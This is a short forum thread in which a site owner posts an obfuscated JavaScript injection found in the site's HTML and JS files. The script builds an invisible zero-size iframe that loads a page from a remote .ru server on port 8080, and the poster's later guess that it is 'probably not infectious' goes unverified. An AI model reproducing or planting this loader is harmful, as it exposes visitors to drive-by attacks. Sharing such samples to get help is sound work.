Found a dodgy script

[SoundsGood]

One of my websites seems to have been compromised as I've found a script added on to all the index.html files and .js files on the server. I'm just wondering if anyone could tell me what it has been doing to my visitors?

try{
var J3mbi4ltd;
function Pyyq9ov11b(){

if (typeof(document.body) == 'object'){
clearInterval(J3mbi4ltd);
}else{
return true;
}
Rep44jigd = '';
B7cl93owbrfi = ['src','h~e0i0gfhRtf'.replace(/[f~C0R]/g, ''), 'wLiEdEt!h!'.replace(/[\!EL\{J]/g, '')];
function Bl888ybmj(F4oyjug6eigg1,Wrf63p68pox7v,G5cufufhvjk){
return F4oyjug6eigg1.setAttribute(Wrf63p68pox7v,G5cufufhvjk);
}
function A511zkc(Fapg082uia){
return document.createElement(Fapg082uia);
}
Natxpwnvsr = 'p';
X0rkknejal = window.frames.length;
if (X0rkknejal<20) Natxpwnvsr = 'iEf:r/a+m/e:'.replace(/[\:\>E\+/]/g, '');
A58okcuvi380 = 'GB';
Gsseqkv3wyv7 = '1544444201';
Gpshvjo37oi = 'http://chaoticice.ru:8080/index.php?Xlzk1egit4zn1=1&pid=1&Xlzk1egit4zn1='+X0rkknejal;
H3plh7ewi5w = 1093499169;
Xudx56rxyt4 = A511zkc('div');
Xudx56rxyt4.id = 'S3whhtlqt';
Xudx56rxyt4.name = 'S3whhtlqt';
H3plh7ewi5w -= 546749584.5*2;
document.body.appendChild(Xudx56rxyt4);
Bv18u7lzq = 'H3plh7ewi5w';
Vdqv0ucv = new Array(Gpshvjo37oi, H3plh7ewi5w,H3plh7ewi5w);
Ey3k2lj1 = document.createElement(Natxpwnvsr);
for (Lh82mv6xml in B7cl93owbrfi){
Bl888ybmj(Ey3k2lj1,B7cl93owbrfi[Lh82mv6xml], Vdqv0ucv[Lh82mv6xml]);
}
document.getElementById('S3whhtlqt').appendChild(Ey3k2lj1);
}

J3mbi4ltd = window.setInterval(Pyyq9ov11b, '300');


}catch(Q9stx2c4myphm){}

 

[SoundsGood]

Hmm not too bad then.. atleast it's probably not infectious.

Now to find out how it got there..

 

[SoundsGood]

There *was* a backup of a phpBB forum in a random folder.. but it wasn't setup with a database so I'm not sure if that's still exploitable. Deleted it now anyway